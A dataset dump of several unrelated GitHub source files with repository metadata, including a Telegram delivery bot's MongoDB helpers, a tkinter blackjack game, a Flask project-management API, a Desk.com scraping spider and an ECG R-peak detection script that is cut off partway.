elif to_stack.is_empty() or from_stack.peek() < to_stack.peek():
disk = from_stack.pop()
to_stack.push(disk)
num_user_moves += 1
break
else:
print("\n\nInvalid Move. Try Again")
print("\n\nYou completed the game in {0} moves, and the optimal number of moves is {1}".format(num_user_moves, num_optimal_moves))
| [
"noreply@github.com"
] | noreply@github.com |
6c1d1eae9b949ccb140ce5643a6b76cfb45e170b | 9beaf19f08859a3706602bb014128e0df83c9223 | /dic_ex4 | 68febee4833f70cbaacfc422313e0bc668c14386 | [] | no_license | 1912souravi/Python | ba8b63f988f658578d327a8ea0421bbc98245edf | cdf3606a321f562bcde41850f08a15e76bf28079 | refs/heads/master | 2021-01-20T23:47:34.365081 | 2017-10-10T01:18:11 | 2017-10-10T01:18:11 | 101,852,403 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 570 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 4 08:13:01 2017
@author: souravi
"""
# Tally 'From' lines by the first field of the timestamp token (lst[5] —
# presumably an HH:MM:SS time, so dom[0] is the hour; verify against the
# actual input file) and print the counts sorted by that key.
lst=[]
dic_day={}
max_v=0   # NOTE(review): max_v / max_k are unused leftovers
max_k=0
file=open("/Users/souravi/Documents/Python/romeo.txt")
'''1'''
for line in file:
    line=line.rstrip()
    lst=line.split()
    # NOTE(review): a blank line would make lst[0] raise IndexError
    if lst[0]=='From':
        dom=lst[5].split(':')
        if dom[0] in dic_day:
            dic_day[dom[0]]+=1
        else:
            dic_day[dom[0]]=1
lst=[]
for k,v in dic_day.items():
    lst.append((k,v))
lst=sorted(lst)
for i in lst:
    print(i[0],i[1])
| [
"noreply@github.com"
] | noreply@github.com | |
17f3f3381b7ad68625cfcd987954b1e8ea98b8f8 | d16ae20e90bfabb6aeef16fd5b19d71fcc45e29f | /confess/forms.py | 432edcb5affdbc904f2f5aa6621a339fcbe1d0fb | [
"MIT"
] | permissive | amartinez1/confessions | 49012af3f7fd8862c592b54c0b5d5a9a5ec4861d | 8c66700525d47e3657ffbcc0aacb11d238519126 | refs/heads/master | 2021-01-02T09:19:11.074743 | 2014-06-16T14:38:25 | 2014-06-16T14:38:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 173 | py | from .models import Post
from django import forms
from django.forms import ModelForm
class ConfessForm(ModelForm):
    """Django ModelForm for creating/editing a confession ``Post``.

    Exposes only the ``title`` and ``text`` fields.
    """
    class Meta:
        model = Post
        fields = ['title','text']
| [
"ncorecarbon@gmail.com"
] | ncorecarbon@gmail.com |
0f000b6128b9efe08f58ca0df022b6cff521951f | ec002f4e1a9d98e2fff2b8d6af0eaaf15fb044ee | /Web/CrawlMasPic/Bing/revoke.py | 2689c52bff43756c661b871adc6003b1c13502b9 | [] | no_license | SeaEagleI/Python | 40fb5c3edf0016f730f4938c03ac9eb29591797b | eda3fd7b590816851894795efd23a58f2cd49dfb | refs/heads/master | 2021-07-15T07:28:33.790788 | 2020-05-17T08:48:49 | 2020-05-17T08:48:49 | 148,288,877 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py | # -*- coding: utf-8 -*-
from config import *
from tqdm import tqdm
cp_lines = [line.split('\t')[-1]+'.jpg' for line in LoadTxtToLines(cp_path) if 'Failed' not in line]
| [
"38852917+SeaEagleI@users.noreply.github.com"
] | 38852917+SeaEagleI@users.noreply.github.com |
71895a10c1b2c7e904d98028e8c8589a2d8b0dc4 | 66ce62faf87aa9f5e6446c6ea0827fec580385ce | /ABCapp/apps.py | 2b9b65b9b2758de921a8bd3510af8c722bf32b2c | [] | no_license | gunjan-prog/project | 1fb0c763223325283d75acaca1c1ac49b1f41b83 | 9b8c74ed0dc9ed18ee5e89ead030db97f520eefc | refs/heads/master | 2022-08-15T12:37:44.411830 | 2020-05-18T08:01:11 | 2020-05-18T08:01:11 | 264,861,908 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | from django.apps import AppConfig
class AbcappConfig(AppConfig):
    """Django application configuration for the ABCapp app."""
    name = 'ABCapp'
| [
"noreply@github.com"
] | noreply@github.com |
a1d117f90824e00c627b17fadd9f17e197db1136 | d348b7062212459b7c3b22c6e1ef0976b3c791f2 | /db.py | 0415fb08710484dee9cccd115d3f7d4f9c725ec1 | [] | no_license | dmitriipolushin/deliverInnoBot | 54d6936880c069fd5f49510e8d656ca18cb3a2a8 | 4ad9a0d35ad17bc0fd96fcf62fbec4e2e3af59a5 | refs/heads/master | 2023-02-15T07:35:36.251169 | 2020-11-11T19:14:11 | 2020-11-11T19:14:11 | 307,364,407 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,846 | py | from pymongo import MongoClient
connection = MongoClient()
db = connection.users_information
def new_user(chat_id, alias):
    """Create a fresh user document in the database.

    Args:
        chat_id (string): id of new user in telegram
        alias (string): alias of new user
    """
    document = {
        '_id': chat_id,
        'next_published_offer_id': 0,
        'next_taken_offer_id': 0,
        'alias': alias,
        'published_offers': {},
        'taken_offers': {},
        'profile': {'your_offers': 0, 'complete_offers': 0},
    }
    db.users.insert_one(document)
def user_exists(chat_id):
    """Return True if a user document with this id exists.

    Args:
        chat_id (string): id of user in telegram
    """
    found = db.users.find_one({'_id': chat_id})
    return found is not None
def add_dungling_offer(chat_id, shop, item, bounty):
    """Attach a pending (not yet approved) offer to the user's document."""
    pending = {'shop': shop, 'item': item, 'bounty': bounty}
    user = db.users.find_one({'_id': chat_id})
    user['dungling_offer'] = pending
    db.users.save(user)
def approve_offer(chat_id):
    """Promote the user's pending ("dungling") offer into the published list.

    Args:
        chat_id (string): id of user in Telegram
    """
    user = db.users.find_one({'_id': chat_id})
    pending = user['dungling_offer']
    slot = user['next_published_offer_id']
    user['published_offers'][str(slot)] = pending
    # reserve the next id for the following offer
    user['next_published_offer_id'] = slot + 1
    db.users.save(user)
def list_published_offers(chat_id):
    """Return the dict of offers this user has published.

    Args:
        chat_id (int): id of user

    Returns:
        dict: user's published offers keyed by offer id
    """
    return db.users.find_one({'_id': chat_id})['published_offers']
def list_taken_offers(chat_id):
    """Return the dict of offers this user has taken.

    Args:
        chat_id (int): id of user

    Returns:
        dict: user's taken offers keyed by offer id
    """
    return db.users.find_one({'_id': chat_id})['taken_offers']
def list_all_offers(chat_id):
    """Return every user document except the requester's own.

    Args:
        chat_id (int): id of the requesting user

    Returns:
        pymongo cursor over the other users' documents
    """
    return db.users.find({'_id': {'$nin': [chat_id]}})
def delete_published_offer(chat_id, offer_id):
    """Remove one published offer from the user's document.

    Args:
        chat_id (int): id of user in telegram and in DB
        offer_id (string): key of the offer to delete
    """
    user = db.users.find_one({'_id': chat_id})
    print('offer deleted')
    print(user['published_offers'][offer_id])
    user['published_offers'].pop(offer_id)
    db.users.save(user)
def delete_taken_offer(chat_id, offer_id):
    """Remove one taken offer from the user's document.

    Args:
        chat_id (int): id of user in telegram and in DB
        offer_id (string): key of the offer to delete
    """
    user = db.users.find_one({'_id': chat_id})
    print('offer deleted')
    print(user['taken_offers'][offer_id])
    user['taken_offers'].pop(offer_id)
    db.users.save(user)
def take_offer(chat_id, user_id, number):
    """Accept another user's published offer.

    Moves the offer into both users' taken-offer lists: the receiver's stored
    record is tagged with the taker's alias and the taker's copy with the
    receiver's alias.

    Bug fix: the original did ``taken_offer = offer`` (same dict object), so
    writing the receiver's alias into the taker's "copy" also clobbered the
    taker's alias in the receiver's record — a shallow copy keeps the two
    records independent, as the original comment intended.

    Args:
        chat_id (int): id of user that takes the offer
        user_id (int): id of user that published the offer
        number (string): key of the offer in the receiver's published list
    """
    taker = db.users.find_one({'_id': chat_id})
    reciever = db.users.find_one({'_id': user_id})
    offer = reciever['published_offers'][number]
    offer['alias'] = taker['alias']
    # independent copy for the taker, tagged with the receiver's alias
    taken_offer = dict(offer)
    taken_offer['alias'] = reciever['alias']
    slot = taker['next_taken_offer_id']
    taker['taken_offers'][str(slot)] = taken_offer
    taker['next_taken_offer_id'] = slot + 1
    reciever['published_offers'][number]['taker_alias'] = taker['alias']
    reciever['taken_offers']['taken' + number] = reciever['published_offers'][number]
    del reciever['published_offers'][number]
    db.users.save(taker)
    db.users.save(reciever)
def get_alias(chat_id):
    """Return the alias stored for the given user id.

    Args:
        chat_id (int): id of the user

    Returns:
        string: the user's alias from the DB
    """
    user = db.users.find_one({'_id': chat_id})
    return user['alias']
"dmitriipolushin@pop-os.localdomain"
] | dmitriipolushin@pop-os.localdomain |
5d339191de8e177da4fd0c015a83e2fab14cadf4 | 2a32d7e35ce7e8e8e669fe69ec81cca28ebed176 | /blackjack.py | 48740e1501fae015d517323bc6976cfa1c5c3578 | [] | no_license | ntrut/Blackjack | 311efa472ab7a570bf3ed78945d869894ca44381 | db10784099bb0fcd6802abfbb14474646edec2d7 | refs/heads/main | 2023-08-22T16:28:08.489762 | 2021-10-22T13:23:43 | 2021-10-22T13:23:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,819 | py | import random
import tkinter
from PIL.Image import Image
mainWindow = tkinter.Tk()
def load_images(card_images):
    """Append (blackjack value, PhotoImage) tuples for a full deck to card_images.

    Number cards keep their face value, J/Q/K count 10 and aces count 1
    (score_hand may later promote one ace to 11).  Images are loaded from
    PNG/<rank><suit>.png and subsampled 8x to fit the table.

    Fix: the original created each face-card PhotoImage twice in a row;
    the redundant load is removed.
    """
    suits = ['H', 'C', 'D', 'S']
    face_cards = ['J', 'Q', 'K', 'A']
    for suit in suits:
        # pip cards 2-10
        for card in range(2, 11):
            name = 'PNG/{}{}.png'.format(str(card), suit)
            image = tkinter.PhotoImage(file=name).subsample(8, 8)
            card_images.append((card, image))
        # face cards and aces
        for card in face_cards:
            name = 'PNG/{}{}.png'.format(str(card), suit)
            image = tkinter.PhotoImage(file=name).subsample(8, 8)
            if str(card) == 'A':
                card_images.append((1, image))
            else:
                card_images.append((10, image))
def deal_card(frame):
    """Take the top card off the global deck, display it in *frame*, return it."""
    card = deck.pop(0)
    label = tkinter.Label(frame, image=card[1], relief='raised')
    label.pack(side="left")
    return card
def score_hand(hand):
    """Return the blackjack score of *hand*, a list of (value, image) tuples.

    At most one ace is promoted from 1 to 11; it is demoted back to 1 if
    the final total would bust (exceed 21).
    """
    values = [card[0] for card in hand]
    total = sum(values)
    if 1 in values:
        total += 10        # promote exactly one ace to 11
        if total > 21:
            total -= 10    # hand would bust: demote it back
    return total
def deal_dealer():
    """Play out the dealer's hand (hit below 17), then announce the result.

    Reads/updates the module-level hands, labels and result_text.
    """
    dealer_score = score_hand(dealer_hand)
    # dealer must draw while under 17 (the 0 bound guards an empty hand)
    while 0 < dealer_score < 17:
        dealer_hand.append(deal_card(dealer_card_frame))
        dealer_score = score_hand(dealer_hand)
        dealer_score_label.set(dealer_score)
    player_score = score_hand(player_hand)
    if player_score > 21:
        result_text.set("Dealer wins!")
    elif dealer_score > 21 or dealer_score < player_score:
        result_text.set("Player wins!")
    elif dealer_score > player_score:
        result_text.set("Dealer wins!")
    else:
        result_text.set("Draw!")
def deal_player():
    """Deal one card to the player, refresh their score label, flag a bust."""
    card = deal_card(player_card_frame)
    player_hand.append(card)
    new_score = score_hand(player_hand)
    player_score_label.set(new_score)
    if new_score > 21:
        result_text.set("Dealer Wins")
# deal_player global player_score
# global player_ace
# card_value = deal_card(player_card_frame)[0]
# if card_value == 1 and not player_ace:
# player_ace = True
# card_value = 11
# player_score += card_value
#
# if player_score > 21 and player_ace:
# player_score -= 10
# player_ace = False
# player_score_label.set(player_score)
# if player_score > 21:
# result_text.set("Dealer Wins")
mainWindow.title("Black Jack")
mainWindow.geometry("640x480")
mainWindow.configure(background="green")
result_text = tkinter.StringVar()
result = tkinter.Label(mainWindow, textvariable=result_text)
result.grid(row=0, column=0, columnspan=3)
card_frame = tkinter.Frame(mainWindow, relief="sunken", borderwidth=1, background="green")
card_frame.grid(row=1, column=0, sticky='ew', columnspan=3, rowspan=2)
dealer_score_label = tkinter.IntVar()
tkinter.Label(card_frame, text="Dealer", background="green", fg='white').grid(row=0, column=0)
tkinter.Label(card_frame, textvariable=dealer_score_label, background="green", fg="white").grid(row=1, column=0)
# embedded frame to hold the card images
dealer_card_frame = tkinter.Frame(card_frame, background="green")
dealer_card_frame.grid(row=0, column=1, sticky="ew", rowspan=2)
player_score_label = tkinter.IntVar()
tkinter.Label(card_frame, text="Player", background="green", fg="white").grid(row=2, column=0)
tkinter.Label(card_frame, textvariable=player_score_label, background="green", fg="white").grid(row=3, column=0)
# embedded frame to hold the card images
player_card_frame = tkinter.Frame(card_frame, background="green")
player_card_frame.grid(row=2, column=1, sticky='ew', rowspan=2)
button_frame = tkinter.Frame(mainWindow)
button_frame.grid(row=3, column=0, columnspan=3, sticky='w')
dealer_button = tkinter.Button(button_frame, text="Dealer", command=deal_dealer)
dealer_button.grid(row=0, column=0)
player_button = tkinter.Button(button_frame, text="Player", command=deal_player)
player_button.grid(row=0, column=1)
# load cards
cards = []
load_images(cards)
# create deck and shuffle
deck = list(cards)
random.shuffle(deck)
print(deck)
dealer_hand = []
player_hand = []
deal_player()
dealer_hand.append(deal_card(dealer_card_frame))
deal_player()
mainWindow.mainloop()
| [
"noreply@github.com"
] | noreply@github.com |
c536b65e7478d8edb1d6e8355ea96b32a2dda8e6 | 7703d7dddeeefb770b75a4a411d1cb9f807d79b0 | /runserver.py | f87354bc72e630d6ae8922589f7d28aca3fe5cae | [] | no_license | Travaill/Project-Management-System-server | d67e7bdcc53c41fe345416f89c694c3515c85052 | ccb29e8abfff0a32f1197b81449df84f006e1906 | refs/heads/master | 2020-03-26T22:58:15.577936 | 2018-08-21T03:13:31 | 2018-08-21T03:13:31 | 145,500,126 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,472 | py | from flask import Flask
from flask import render_template
from flask import request
from flask import url_for
from flask_cors import *
from login import *
from user import *
from project import *
from manage import *
app=Flask(__name__)
key = "JLUIE487"
CORS(app, resources=r'/*')
@app.route('/login', methods=['POST']) # login
def Login():
    """Authenticate a user; returns SignIn()'s payload and its status code."""
    if request.method == 'POST':
        sn=request.get_json()['sn']
        password=request.get_json()['password']
        info = SignIn(sn, password)
        return json.dumps(info),info['status_code']
@app.route('/user', methods=['POST','PUT','GET'])
def UserOperation(): # register / fetch / update a user
    """POST registers a new user (no token needed); GET and PUT require a
    valid X-USER-TOKEN header and read/update the token's user."""
    token = request.headers.get('X-USER-TOKEN')
    if request.method == 'POST':
        sn = request.get_json()['sn']
        name=request.get_json()['name']
        password = request.get_json()['password']
        email = request.get_json()['email']
        info = AddUser(sn,name,password,email)
        return json.dumps({'info': info['info']}), info['statusCode']
    else:
        if certify_token(key, token):
            if request.method == 'GET':
                info = GetUser(token)
                # debug prints left in place
                print (token)
                print (info)
                return json.dumps(info)
            elif request.method == 'PUT':
                email = request.get_json()['email']
                name = request.get_json()['name']
                info = UpdateUser(token,name,email)
                return json.dumps(info)
        else:
            # invalid/expired token: ask the client to log in again
            return json.dumps({'info': '请重新登录'}), 401
@app.route('/project/<int:id>', methods=['POST','GET','PUT','DELETE']) # project-related endpoints
def ProjetOperation(id):
    """Project CRUD; all verbs require a valid X-USER-TOKEN.

    The URL `id` is only used by DELETE — POST/PUT read their data (and PUT
    its own id) from the JSON body, GET lists the token owner's projects.
    """
    token = request.headers.get('X-USER-TOKEN')
    if certify_token(key, token):
        if request.method == 'GET': # get project list
            data = GetProject(token)
            return json.dumps(data)
        elif request.method == 'POST':
            name = request.get_json()['name']
            description = request.get_json()['description']
            site_address = request.get_json()['site_address']
            info = AddProject(token, name, description, site_address)
            return json.dumps({'info':info['info']}),info['statusCode']
        elif request.method == 'PUT':
            name = request.get_json()['name']
            description = request.get_json()['description']
            site_address = request.get_json()['site_address']
            # PUT ignores the URL id and uses the one from the body
            id = request.get_json()['id']
            info = UpdateProject(id, name, description, site_address)
            return json.dumps({'info': info['info']}), info['statusCode']
        elif request.method == 'DELETE':
            info = DelProject(id)
            return json.dumps({'info': info['info']}), info['statusCode']
    else:
        return json.dumps({'info': '请重新登录'}), 401
@app.route('/manage/project', methods=['POST','GET','PUT','DELETE'])
def Project():
    """Admin project listing; only GET is implemented.

    Fix: the original returned None (a 500 error in Flask) for non-GET
    requests and for invalid tokens; both now get explicit responses,
    matching the 401 style used by the other routes.
    """
    token = request.headers.get('X-USER-TOKEN')
    if certify_token(key, token):
        if request.method == 'GET':
            info = projectManage(token)
            return json.dumps(info)
        # POST/PUT/DELETE are declared on the route but not implemented yet
        return json.dumps({'info': 'method not implemented'}), 405
    return json.dumps({'info': '请重新登录'}), 401
@app.route('/manage/user', methods=['POST','GET'])
def User():
    """Admin user listing; only GET is implemented.

    Fix: the original returned None (a 500 error in Flask) for POST
    requests and for invalid tokens; both now get explicit responses,
    matching the 401 style used by the other routes.
    """
    token = request.headers.get('X-USER-TOKEN')
    if certify_token(key, token):
        if request.method == 'GET':
            info = UserManage(token)
            return json.dumps(info)
        # POST is declared on the route but not implemented yet
        return json.dumps({'info': 'method not implemented'}), 405
    return json.dumps({'info': '请重新登录'}), 401
if __name__=='__main__':
app.run(debug=True) | [
"2329677945@qq.com"
] | 2329677945@qq.com |
3b522ad5c1bc3e9b2c00cb9dae382a3145c20fd4 | 7cd8ee14711eaf33cee0d9e06e78a974fc579242 | /PIFramework/juicer/spiders/desk_customer_browse.py | e02c7f424af19bcbefa4456451ba138e83a60a4e | [] | no_license | Chandler-Song/pi | c618117dfdd9a7496a57c69f029851e94787f591 | aebc6d65b79ed43c66e7e1bf16d6d9f31b470372 | refs/heads/master | 2022-03-13T02:44:30.452673 | 2019-02-19T09:38:45 | 2019-02-19T09:38:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,849 | py | from juicer.utils import *
from w3lib.http import basic_auth_header
class deskcustomerbrowse(JuicerSpider):
name = "desk_customer_browse"
start_urls = ('https://www.desk.com/',)
    def __init__(self, *args, **kwargs):
        """Set up HTTP auth headers, the MySQL connection, the batch of
        customer URLs still to crawl, and the upsert statement."""
        super(deskcustomerbrowse, self).__init__(*args, **kwargs)
        # SECURITY NOTE(review): credentials are hardcoded here (and for
        # MySQL below) — they should come from configuration/secrets.
        self.auth = basic_auth_header('chetan.m@positiveintegers.com', 'Welcome@123')
        self.main_url = 'https://sathyamcinemas.desk.com'
        self.headers = {
                'Accept': 'application/json',
                'Content-Type': 'application/json',
                'Authorization': self.auth
                }
        self.conn = MySQLdb.connect(user="root", host = "localhost", db="DESKCASES", passwd='root', use_unicode=True)
        self.cur = self.conn.cursor()
        # force utf8 on both the connection and the session
        self.conn.set_character_set('utf8')
        self.cur.execute('SET NAMES utf8;')
        self.cur.execute('SET CHARACTER SET utf8;')
        self.cur.execute('SET character_set_connection=utf8;')
        # pick up to 50k customer URLs that have not been scraped yet
        get_query_param = "select case_customer_url from desk_cases where case_customer_url not in (select customer_link from desk_customer) order by rand() limit 50000"
        self.cur.execute(get_query_param)
        self.profiles_list = [i for i in self.cur.fetchall()]
        # upsert: insert a customer row, or refresh every column on duplicate key
        self.customer_insert = "INSERT INTO desk_customer(customer_link, customer_id, customer_company_link, customer_twitter_user, customer_access_company_cases, customer_access_private_portal, customer_addresses, customer_avatar, customer_background, customer_company, customer_company_name, customer_created_at, customer_custom_fields, customer_display_name, customer_emails, customer_external_id, customer_first_name, customer_label_ids, customer_language, customer_last_name, customer_locked_until, customer_phone_numbers, customer_title, customer_uid, customer_updated_at, created_at, modified_at, last_seen ) values(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, now(), now(), now()) on duplicate key update modified_at = now(), customer_link=%s, customer_id=%s, customer_company_link=%s, customer_twitter_user=%s, customer_access_company_cases=%s, customer_access_private_portal=%s, customer_addresses=%s, customer_avatar=%s, customer_background=%s, customer_company=%s, customer_company_name=%s, customer_created_at=%s, customer_custom_fields=%s, customer_display_name=%s, customer_emails=%s, customer_external_id=%s, customer_first_name=%s, customer_label_ids=%s, customer_language=%s, customer_last_name=%s, customer_locked_until=%s, customer_phone_numbers=%s, customer_title=%s, customer_uid=%s, customer_updated_at=%s"
def __del__(self):
self.conn.close()
self.cur.close()
def parse(self, response):
sel = Selector(response)
if self.profiles_list:
for cus in self.profiles_list:
yield Request(cus[0], callback=self.parse_customer, headers = self.headers, meta = {"customer_link": cus[0]})
    def parse_customer(self, response):
        """Parse a Desk.com customer JSON payload and upsert it into MySQL.

        Handles both list responses (``_embedded.entries``) and a single
        customer object; multi-valued fields are joined with '<>'.
        """
        customer_links = response.meta.get('customer_link', '')
        output = response.body
        output = json.loads(output.strip('\n'))
        total_entries = output.get('_embedded', {}).get('entries', [])
        if not total_entries:
            # single-customer endpoint: wrap the object so the loop below works
            if isinstance(output, dict):
                toal_en = []
                toal_en.append(output)
                total_entries = toal_en
        for ttl_en in total_entries:
            # relative hrefs are made absolute against the portal base URL
            company_links = ttl_en.get('_links', {}).get('company', {})
            if company_links:
                company_links = company_links.get('href', '')
            twitter_user = ttl_en.get('_links', {}).get('twitter_user', {})
            if twitter_user:
                twitter_user = twitter_user.get('href', '')
            if company_links:
                company_links = "%s%s" %(self.main_url, company_links)
            if twitter_user:
                twitter_user = "%s%s" %(self.main_url, twitter_user)
            access_company_cases = ttl_en.get('access_company_cases', '')
            access_private_portal = ttl_en.get('access_private_portal', '')
            addresses = '<>'.join(ttl_en.get('addresses', []))
            avatar = ttl_en.get('avatar', '')
            background = ttl_en.get('background', '')
            company = ttl_en.get('company', '')
            company_name = ttl_en.get('company_name', '')
            created_at = ttl_en.get('created_at', '')
            # custom fields are stored as a JSON blob (empty string when absent)
            custom_fields = ttl_en.get('custom_fields', {})
            if not custom_fields:
                custom_fields = ''
            else:
                custom_fields = json.dumps(custom_fields)
            display_name = ttl_en.get('display_name', '')
            emails = ttl_en.get('emails', [])
            if emails:
                emails = '<>'.join(["%s%s%s" % (te.get('type'), ':-', te.get('value')) for te in emails])
            else:
                emails = ''
            external_id = ttl_en.get('external_id', '')
            first_name = ttl_en.get('first_name', '')
            id_ = str(ttl_en.get('id', ''))
            label_ids = '<>'.join([str(ld) for ld in ttl_en.get('label_ids', [])])
            language = ttl_en.get('language', '')
            last_name = ttl_en.get('last_name', '')
            locked_until = ttl_en.get('locked_until', '')
            # first phone number only; bare except covers missing/empty lists
            try:
                phone_numbers_dict = ttl_en.get('phone_numbers', [])
                phone_numbers = phone_numbers_dict[0]['value']
            except:
                phone_numbers = ''
            title = ttl_en.get('title', '')
            uid = ttl_en.get('uid', '')
            updated_at = ttl_en.get('updated_at', '')
            # values are duplicated because the upsert binds each column twice
            values = (customer_links, id_, company_links, twitter_user, access_company_cases, access_private_portal, addresses, avatar, background, company, company_name, created_at, custom_fields, display_name, emails, external_id, first_name, label_ids, language, last_name, locked_until, phone_numbers, title, uid, updated_at, customer_links, id_, company_links, twitter_user, access_company_cases, access_private_portal, addresses, avatar, background, company, company_name, created_at, custom_fields, display_name, emails, external_id, first_name, label_ids, language, last_name, locked_until, phone_numbers, title, uid, updated_at)
            self.cur.execute(self.customer_insert, values)
| [
"aravind@headrun.com"
] | aravind@headrun.com |
df6d16af59ecc459d304d7406ac8442ed9b48f06 | 26771494974942f4ab18d2cd8247506c344e1d14 | /117-populatingNextRightPointersinEachNodeII.py | 9b9e705cd655c6bfec49ca57ca65aa58890158d4 | [] | no_license | wangyunpengbio/LeetCode | 9f4c6076e067c5e847d662679483f737d40e8ca5 | cec1fd11fe43177abb2d4236782c0f116e6e8bce | refs/heads/master | 2020-04-29T22:28:25.899420 | 2020-04-03T07:37:26 | 2020-04-03T07:37:26 | 176,448,957 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,312 | py | """
# Definition for a Node.
class Node:
def __init__(self, val, left, right, next):
self.val = val
self.left = left
self.right = right
self.next = next
"""
class Solution:
    def connect(self, root: 'Node') -> 'Node':
        """Link each node's ``next`` to its right neighbor on the same level.

        Level-order traversal keeping one list per level.  Fixes two
        inefficiencies of the original queue version: O(n) ``list.pop(0)``
        on every dequeue, and enqueueing of None placeholder children
        (which doubled the queue traffic just to detect level boundaries).

        Returns the (mutated) root, or None for an empty tree.
        """
        if root is None:
            return None
        level = [root]
        while level:
            # wire up next pointers within this level, left to right
            for left, right in zip(level, level[1:]):
                left.next = right
            level[-1].next = None
            # collect the next level's real (non-None) children
            level = [child for node in level
                     for child in (node.left, node.right) if child is not None]
        return root
| [
"wangyunpeng_bio@qq.com"
] | wangyunpeng_bio@qq.com |
cb836705f68c0926ca5a50e930949c6f02ab4f2e | 1b3d2752ced80ab6dee1ef314d2f66cd39160117 | /zero-cross.py | 2562e37424e81ee74ede0c69b3b2018e53fc10d0 | [] | no_license | MaxPilgrim/r_peak_detection | 2c93e024d3662c31419f6e33a7c3fb7a953129de | f064ffa4f0f087321e5453f304e58e6d5f6cfa6d | refs/heads/master | 2016-08-07T14:40:47.895533 | 2015-06-10T20:50:10 | 2015-06-10T20:50:10 | 37,219,595 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,194 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import shutil
import os
import codecs
import sys
import math
import matplotlib.pyplot as plt
DATA_PATH = 'data/data_1.in'
FILTER_PATH = 'filter/FIR_kernel_27.in'
n = 6000
lambda_k = 0.99
c_k = 4
lambda_D = 0.99
lambda_Th = 0.99
filterDelay = 14
filterN = 27
def sign(x):
    """Return -1 for negative x, +1 otherwise (zero counts as positive)."""
    return -1 if x < 0 else 1
def readECG():
    """Load the ECG from DATA_PATH, patch dropouts, return the first n samples.

    Samples equal to the sentinel -10000000 (missing data) are replaced by
    the mean of the valid samples (the baseline).  Note: this relies on
    Python 2 semantics — ``map`` returns a list here, which is iterated
    more than once.
    """
    lines = open(DATA_PATH,'r').readlines()
    ecg = map(lambda x: float(x) , lines) #* 255
    baseline = 0
    c = 0
    # mean of all non-sentinel samples
    for e in ecg:
        if e != -10000000 :
            baseline += e
            c += 1
    baseline /= c
    ecg = map(lambda x: x if x != -10000000 else baseline, ecg)
    '''
    a = min(ecg)
    b = max(ecg)
    d = 127.0
    c = -127.0
    ecg = map(lambda x: (x - a) / (b - a) * (d - c) + c, ecg)
    f = open('data.out','w')
    for e in ecg:
        f.write(str(e) + "\n")
    f.close()
    '''
    #ecg = map(lambda x: x * 255, ecg)
    #for testing
    return ecg[0:n]
def filterBandPassFIR(ecg):
    """Convolve ecg with the FIR kernel read from FILTER_PATH.

    Side effects: sets the module globals filterN (kernel length) and
    filterDelay (filterN / 2).  The first len(kernel) samples are skipped,
    so the returned signal is len(ecg) - len(kernel) samples long.
    """
    ker = open(FILTER_PATH,'r').readlines()
    ker = map(str.strip, ker)
    ker = map(float, ker)
    global filterN
    filterN = len(ker)
    global filterDelay
    filterDelay = filterN / 2
    # direct-form convolution, valid region only
    newEcg = []
    for i in range(len(ker), len(ecg)):
        v = 0.0
        for j in range(0,len(ker)):
            v += ker[j] * ecg[i - j]
        newEcg.append(v)
    return newEcg
def nonLinearFilter(ecg):
    """Signed squaring: each sample becomes sample * |sample| (keeps sign)."""
    return [v * abs(v) for v in ecg]
def addHFS(input):
    """Superimpose an alternating (+/-) high-frequency component whose
    amplitude tracks an EMA (rate lambda_k) of the signal magnitude * c_k."""
    z = []
    k = 0.0
    for i in range(len(input)):
        k = lambda_k * k + (1 - lambda_k) * abs(input[i]) * c_k
        z.append(input[i] + pow(-1, i) * k)
    return z
def computeFeature(z):
    """Smoothed zero-crossing indicator of z.

    For each consecutive pair, the raw feature is 1 when the samples have
    opposite signs (zero counts as positive) and 0 otherwise; it is then
    smoothed with an EMA of rate lambda_D.  Output length is len(z) - 1.
    """
    feat = []
    prev = 0
    for i in range(1, len(z)):
        crossed = 1 if (z[i] < 0) != (z[i - 1] < 0) else 0
        prev = lambda_D * prev + (1 - lambda_D) * crossed
        feat.append(prev)
    return feat
def computeTheta(d):
    """Exponentially smoothed copy of d (rate lambda_Th); the adaptive threshold."""
    out = []
    prev = 0.0
    for v in d:
        prev = lambda_Th * prev + (1 - lambda_Th) * v
        out.append(prev)
    return out
def getEvents(D, Th):
    """Detect events where the feature D drops below the threshold Th.

    Returns a list of (start, end) index pairs.  An event that begins fewer
    than 42 samples after the previous one ended is merged into it (the
    merged pair replaces the previous entry).  An event still open at the
    end of the signal is closed at len(D).  Samples where D equals Th change
    nothing.
    """
    events = []
    in_event = False
    merging = False
    start = 0
    last_end = -1000  # far in the past so the first event never merges
    for i in range(len(D)):
        d, th = D[i], Th[i]
        if not in_event and d < th:
            # event opens; merge with the previous one if the gap is short
            in_event = True
            merging = (i - last_end) < 42
            start = events[-1][0] if merging else i
        elif in_event and d > th:
            # event closes
            last_end = i
            if merging:
                events[-1] = (start, i)
            else:
                events.append((start, i))
            in_event = False
            merging = False
            start = 0
    if in_event:
        events.append((start, len(D)))
    return events
def getRpeaks(events, y):
    """Return the index of the maximum of y within each (start, end) event.

    Ties keep the earliest index (matching the original strict comparison).

    Fix: the original guarded with ``if y_max_ind > 0``, which conflated
    "empty event range" with "peak at sample 0" and silently discarded a
    genuine peak located at index 0.  Empty ranges are now skipped
    explicitly, and index-0 peaks are reported.
    """
    rPeaks = []
    for start, end in events:
        if start >= end:
            continue  # empty range: nothing to search
        best = start
        for i in range(start + 1, end):
            if y[i] > y[best]:
                best = i
        rPeaks.append(best)
    return rPeaks
def main():
    """Full R-peak pipeline: read ECG, band-pass + nonlinear filter, add the
    high-frequency sequence, threshold the zero-crossing feature, locate the
    R peaks, print them and (optionally) plot.  Python 2 (print statements).
    """
    plotFlag = True
    tm = time.time()
    ecg = readECG()
    # 500 Hz sampling assumed -> 0.002 s per sample (TODO confirm)
